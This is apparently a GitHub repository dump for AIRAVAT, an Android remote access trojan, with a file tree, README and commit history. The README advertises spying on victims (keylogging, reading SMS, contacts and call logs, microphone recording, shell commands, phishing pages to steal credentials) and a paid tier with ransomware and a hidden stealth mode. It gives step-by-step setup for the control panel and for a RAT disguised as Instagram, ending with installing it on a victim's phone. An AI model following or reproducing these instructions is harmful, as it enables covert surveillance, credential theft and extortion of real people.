======================: FILES :======================
AIRAVAT
├── ANDROID APP
│   └── Instagram.apk
├── LICENSE
├── README.md
└── WEB PANEL
    ├── asset
    │   └── eglantine.woff
    ├── firebase-app.js
    ├── firebase-auth.js
    ├── firebase-database.js
    ├── firebase-storage.js
    ├── img
    │   ├── bg.png
    │   ├── clip.png
    │   ├── cont.png
    │   ├── dump_call_logs.png
    │   ├── dump_contacts.png
    │   ├── dump_device_info.png
    │   ├── dump_location.png
    │   ├── dump_messages.png
    │   ├── i4.png
    │   ├── ic3.png
    │   ├── img1.png
    │   ├── img2.png
    │   ├── img3.png
    │   ├── img4.png
    │   ├── img5.png
    │   ├── img6.png
    │   ├── imgg1.png
    │   ├── imgg2.png
    │   ├── imgg3.png
    │   ├── imgg.jpg
    │   ├── inbox.png
    │   ├── INCOMING.png
    │   ├── itune.png
    │   ├── list_installed_apps.png
    │   ├── logo.png
    │   ├── microphone_rec.png
    │   ├── MISSED.png
    │   ├── null.png
    │   ├── outbox.png
    │   ├── OUTGOING.png
    │   ├── phish.png
    │   ├── scams.png
    │   ├── send_message.png
    │   ├── sent.png
    │   ├── shell_command.png
    │   ├── toast.png
    │   ├── wall1.png
    │   ├── wall2.png
    │   ├── wall3.png
    │   └── web.png
    ├── imgg
    │   ├── dropbox3.png
    │   ├── facebook2.png
    │   ├── facebook5.png
    │   ├── free_fire3.png
    │   ├── github1.png
    │   ├── instagram1.png
    │   ├── linkedin1.png
    │   ├── messenger1.png
    │   ├── microsoft1.png
    │   ├── netflix1.png
    │   ├── paypal2.png
    │   ├── protonmail1.png
    │   ├── pubg2.png
    │   ├── snapchat1.png
    │   ├── tumblir1.png
    │   ├── twitter1.png
    │   ├── wordpress1.png
    │   └── yahoo1.png
    ├── index.html
    ├── jquery.js
    └── script.js

5 directories, 69 files
======================: README CONTENT :======================

<p align="center">
<img src='WEB PANEL/img/logo.png' style="height:100px;width:100px;" >
</p>
<h1 align=center>AIRAVAT</h1>

#### A multifunctional Android RAT with GUI based Web Panel without port forwarding.

<div align="center">

[![https://telegram.me/th30neand0nly0ne](https://img.shields.io/badge/Telegram-Channel-orange.svg?style=flat-square)](https://telegram.me/th30neand0nly0ne)
[![https://telegram.me/th30neand0nly](https://img.shields.io/badge/Telegram-@th30neand0nly-blue.svg?style=flat-square)](https://telegram.me/th30neand0nly)

</div>

## Features
 - Read all the files of Internal Storage
 - Download Any Media to your Device from Victims Device
 - Get all the system information of Victim Device
 - Retrieve the List of Installed Applications
 - Retrive SMS
 - Retrive Call Logs
 - Retrive Contacts
 - Send SMS
 - Gets all the Notifications 
 - Keylogger
 - Admin Permission 
 - Show Phishing Pages to steal credentials through notification.
    - Steal credentials through pre built phishing pages
    - Open any suspicious website through notification to steal credentials.
 - Record Audio through Mic
 - Play music in Victim's device
 - Vibrate Device
 - Text To Speech 
 - Turn On/Off Torch Light
 - Change Wallpaper
 - Run shell Commands
 - Get Clipboard text (Only When app's Activity is visible)
 - Launch Any URL (Only When app's Activity is visible)
 - Pre Binded with [Instagram Webview Phishing ](https://github.com/Th30neAnd0nly/PI)
 - Runs In Background 
    - Auto Starts on restarting the device
    - Auto Starts when any notification arrives
 - No port forwarding needed

<img align=center src=./.github/img.jpg >


## Requirements
 - Firebase Account
 - [ApkEasy Tool](https://apk-easy-tool.en.lo4d.com/windows) ( For PC ) or 
[ApkTool M](https://maximoff.su/apktool/?lang=en) ( for Android)


## How to Build 
  ### Firebase Setup
 1. Create an Firebase Account and afterwords create a new project with any name.
 1. Enable Firebase Database and Firebase Storage.
 1. In Firebase Database Click on the rules and set `.read` and `.write` to `true`
    - ```js
          {
           "rules": {
                   ".read": "true",
                   ".write": "true"
                    }
          }
      ```
 1. In Firebase Storage allow reads and writes for all paths.
    - ```js
        rules_version = '2';
        service firebase.storage {
        match /b/{bucket}/o {
            match /{allPaths=**} {
               allow read, write 
              }
          }
       }
      ```
 1. Now Go to project overview and create an Android App and download the `google-services.json` file.
 1. Also create a web app and copy the config of webapp.
   ### Panel Setup
 1. You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
 1. Open [index.html](./WEB%20PANEL/index.html) File and from [line number 16](https://github.com/Th30neAnd0nly/AIRAVAT/blob/302dca641bb04c6bed72d1b2cebdfc79ccfbb046/WEB%20PANEL/index.html#L16) replace the config with your web app config which you have created on Step 6.
 1. Save the file , Your Panel Setup is completed.
 ### Android RAT
 1. Download [Instagram.apk](./ANDROID%20APP/Instagram.apk)
 1. Decompile it using any Decompiler recommend above.
 1. Now open `res/values/strings.xml` file.
 1. Replace values of `firebase_database_url ` , `google_api_key` , `google_app_id` , `google_storage_bucket` , `project_id` with your Firebase Account using `google-services.json` file which you have downloaded on step 5
    - Example 
       ```xml 
       <string name="firebase_database_url">https://your_database_url.firebase.com</string>
       <string name="google_api_key">your_api_key</string>
       <string name="google_app_id">your_app_id</string>
       <string name="google_storage_bucket">your_storage_bucket_url</string>
       <string name="project_id">project_id</string>
       ```
 1. Now compile the code with appt2.
 1. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.
  ### PoC Video 
 1. ~~https://youtu.be/i3JAHcsWwu0 (old video)~~
  ### Tutorial Videos
  1. https://t.me/AiravatRat/3 (Mr.Ethical YT)

### ❤️Supporters❤️
[![Stargazers repo roster for @th30neand0nly/AIRAVAT](https://reporoster.com/stars/dark/Th30neAnd0nly/AIRAVAT)](https://github.com/Th30neAnd0nly/AIRAVAT/stargazers)

[![Forkers repo roster for @th30neand0nly/AIRAVAT](https://reporoster.com/forks/dark/Th30neAnd0nly/AIRAVAT)](https://github.com/Th30neAnd0nly/AIRAVAT/network/members)

## AIRAVAT PRO <img src='WEB PANEL/img/logo.png' style="height:30px;width:30px;" >
 1. Read , Delete files from victim's device
 1. Encrypt any file in victim's device
 1. Lock Victims Device with 4 digit Pin Code
 1. Capture Photo from Front and Back Camera
 1. Capture Screenshot from background 
 1. Automatically Record Incoming and Outgoing Calls
 1. Get Sim Card Information
 1. Ransomware (encrypt all the files and show the notification demanding for ransom)
 1. Auto Start Permission for all chinese vendors.
 1. Hidden App without Foreground service notification (full stealth mode)
<img align=center src=./.github/jpg.jpg >

 ### PoC Video
  1. https://t.me/th30neand0nly0ne/21


## DISCLAIMER
<p align="center">
 TO BE USED FOR EDUCATIONAL PURPOSES ONLY
</p>


The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read [LICENSE](LICENSE).








====================== GIT HISTORY: ======================
cb59fcd HEAD@{0}: clone: from https://github.com/Th30neAnd0nly/AIRAVAT
commit cb59fcd07ee3239e79ca338574e2a42dfead8b16
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Dec 18 10:05:49 2022 +0530

    Update README.md

commit 5b6291df16e69b2641ea08b93b1046554b6ff347
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Thu Dec 8 21:34:07 2022 +0530

    Update index.html

commit 393895dcb4a52b131d56c57fdf07adbd8155d0d9
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Mon Nov 28 12:25:55 2022 +0530

    Update index.html

commit 9f7ae2ba7357ba2ce68c92f9a79717f816169107
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Thu Nov 3 18:02:07 2022 +0530

    Update README.md

commit 5ae948c83ed2286ecd07cd4cd9b432c8b054d79f
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Oct 21 13:43:10 2022 +0530

    Update README.md

commit 5a5bc29001fcb307a1bdf8066beb3b27949bd3e7
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Wed Sep 28 23:34:57 2022 +0530

    Update README.md

commit 108ba6eb08ebf8f79fcd8a30b59b34511d5b5068
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Sep 17 07:54:31 2022 +0530

    Update README.md

commit bb16ec9847ec127b28a4e8f6a545eedcc74704ec
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Sep 11 20:18:36 2022 +0530

    Update README.md

commit f93d19594c19d9e3fdb5955cbb72d612aa25c045
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Sep 3 08:11:22 2022 +0530

    Update index.html

commit 6d4f95e4aa7fa9c0e4f9b648894fe456338c50a8
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Sep 3 08:10:51 2022 +0530

    Update README.md

commit 0ae94b00adbb8913cd0785d8742ce49ae1e25b25
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Mon Aug 22 12:34:26 2022 +0530

    Add files via upload

commit b3f8eb84505472efcd2886b6b731da30ce5fd3f6
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Aug 14 18:11:17 2022 +0530

    Update README.md

commit c04dbebbae26a3e957e4ebc7226745d5e7164b9b
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Aug 14 18:10:20 2022 +0530

    Add files via upload

commit 281cde92d534dba5b5b483b97dac5e416360bf5f
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Aug 14 17:54:48 2022 +0530

    Update README.md

commit 40a033e43edb6511554899c5c79a25b30c1094fb
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Aug 14 17:54:23 2022 +0530

    Update README.md

commit e32dd94364e76d7d20f16ea60e2be990a01c3612
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Aug 13 20:26:18 2022 +0530

    Update README.md

commit 57a36cf8574679760c1678a242945b83be9c0b58
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Jul 30 08:21:36 2022 +0530

    Update README.md

commit 65f7622c208a5cef99e097b916dfd2e41c75b7f9
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Wed Jul 20 07:02:56 2022 +0530

    Update README.md

commit 32995e2720f5320cfdd87b0fab390ea149ac3518
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jul 15 12:04:47 2022 +0530

    Update README.md

commit 5d21794ddb807a40de6d234e2ea95a655dc66bf7
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jul 15 12:00:44 2022 +0530

    Add files via upload

commit d816e3d9f9782e6720112ba01ec7351fd5ed4345
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jul 15 11:57:29 2022 +0530

    Add files via upload

commit 45be236a326726c489f1eba61be44eb863ec8ec0
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jul 15 11:56:34 2022 +0530

    Add files via upload

commit 1b08c33e62ed19abf6db92336f720a5871b4a422
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jul 15 11:54:52 2022 +0530

    Add files via upload

commit b7d9e47f3125af4a7cb9284e5150c3b2faec0dba
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Mon Jun 27 11:08:59 2022 +0530

    Update index.html

commit ba221ee2bc7ca67c9d0fac8923ed2b6483f185f0
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Mon Jun 20 11:09:33 2022 +0530

    Update README.md

commit d5c9c95b6c0de8a82f2d85b7da6b60122446f6e0
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Thu Jun 9 23:13:42 2022 +0530

    Create FUNDING.yml

commit 2326596f77d5f2150669a782532d905995efa80c
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jun 3 06:33:53 2022 +0530

    Delete null

commit 8ddf1cb4fc514255dcd307aad559b15f1e2a8a0d
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Fri Jun 3 06:33:33 2022 +0530

    Create null

commit 89a4745e89bbe83f4ebc1abddefeac7a05881f42
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Mon May 16 07:41:37 2022 +0530

    Update README.md

commit 42af0dbbd1aa1d3e8ed106b03982241b4d7fce59
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Tue May 10 05:46:39 2022 +0530

    Update index.html

commit 6f60ab61dd8b6247324f7db12d59439d1d36654a
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Tue May 10 05:44:36 2022 +0530

    Update index.html

commit 2b8cee263831b9a12fc1aa1fc6b50570845bccee
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Thu May 5 20:27:53 2022 +0530

    Update README.md

commit e36f72504cd6ef11112ce1fd63528ddf507c510c
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Tue May 3 21:30:18 2022 +0530

    Update README.md

commit 77fd97c98c4776bc01bc64c4ee7b692257fd8ff8
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Wed Apr 20 12:58:27 2022 +0530

    Update index.html

commit af48727d0feefee26ecfacb315634f167d6f81b7
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 10:19:34 2022 +0530

    Update README.md

commit f03a3e4ed547b6f97751efdb59eae0bbc4cc97eb
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 10:12:53 2022 +0530

    Update README.md

commit de1b012b6e57bba0e4acddc1516f4d3de3b5318d
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:55:04 2022 +0530

    Update README.md

commit 048088f539f997ce089ba0d996455d70dde3a3e6
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:34:22 2022 +0530

    Update README.md

commit 302dca641bb04c6bed72d1b2cebdfc79ccfbb046
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:19:49 2022 +0530

    Update README.md

commit 2e655cf50a8e5cb52afcb0e1d1758d6c2eaffa48
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:17:48 2022 +0530

    Update README.md

commit c96714185bef7fcfd5fde6827a7df2b08ae1eca7
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:09:37 2022 +0530

    Update README.md

commit ed057d4bc1def2bdccfa7cba9d3bc601da5f1b12
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 09:04:10 2022 +0530

    Create README.md

commit f891af177b6134bdff524148592beb7878fc0752
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:49:07 2022 +0530

    Delete x

commit 2df54e51de01fc1bcb044208439fc92bbb53ab11
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Apr 16 20:18:31 2022 -0700

    Add files via upload

commit 5184718b9121af20d7c258a876b31a3c57ff22ca
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:47:49 2022 +0530

    Create x

commit 83c90cf8cc37975db12e3208b0b49dc35e18d095
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:47:35 2022 +0530

    Delete x

commit b6a5942ea9873a01e0a5aaa5cc7620d40856b3bc
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:47:23 2022 +0530

    Delete x

commit 68fa90896e7b271d556c9794c5ca94cec41813d5
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Apr 16 20:17:07 2022 -0700

    Add files via upload

commit 298bae0b1777d8d3cf3b6a48e57eb7b3e89a4609
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:45:03 2022 +0530

    Create x

commit 96c5ebd7a9b2ad17072991a708705205c91ccbc6
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Apr 16 20:14:38 2022 -0700

    Add files via upload

commit f8b5df763947001faab6ce85022fc24413f9f939
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:44:23 2022 +0530

    Create x

commit 71a00ed7fa288f67017b984bb954b3eb36a75182
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Apr 16 20:14:07 2022 -0700

    Add files via upload

commit 784969b725e48df75f5dacf9bdc1d0180becab70
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:43:38 2022 +0530

    Create index.html

commit f17c5b4f1e42f884fd2945e6e4fc74da4657872c
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sat Apr 16 20:13:17 2022 -0700

    Add files via upload

commit af538240ca68ba73333a7f714ebba97a874b0cd3
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:42:02 2022 +0530

    Create Instagram.apk

commit bc460b17cba302c0bd530bc1d98065671d984803
Author: Prateek Chaubey <41151614+prateek-chaubey@users.noreply.github.com>
Date:   Sun Apr 17 08:36:48 2022 +0530

    Initial commit
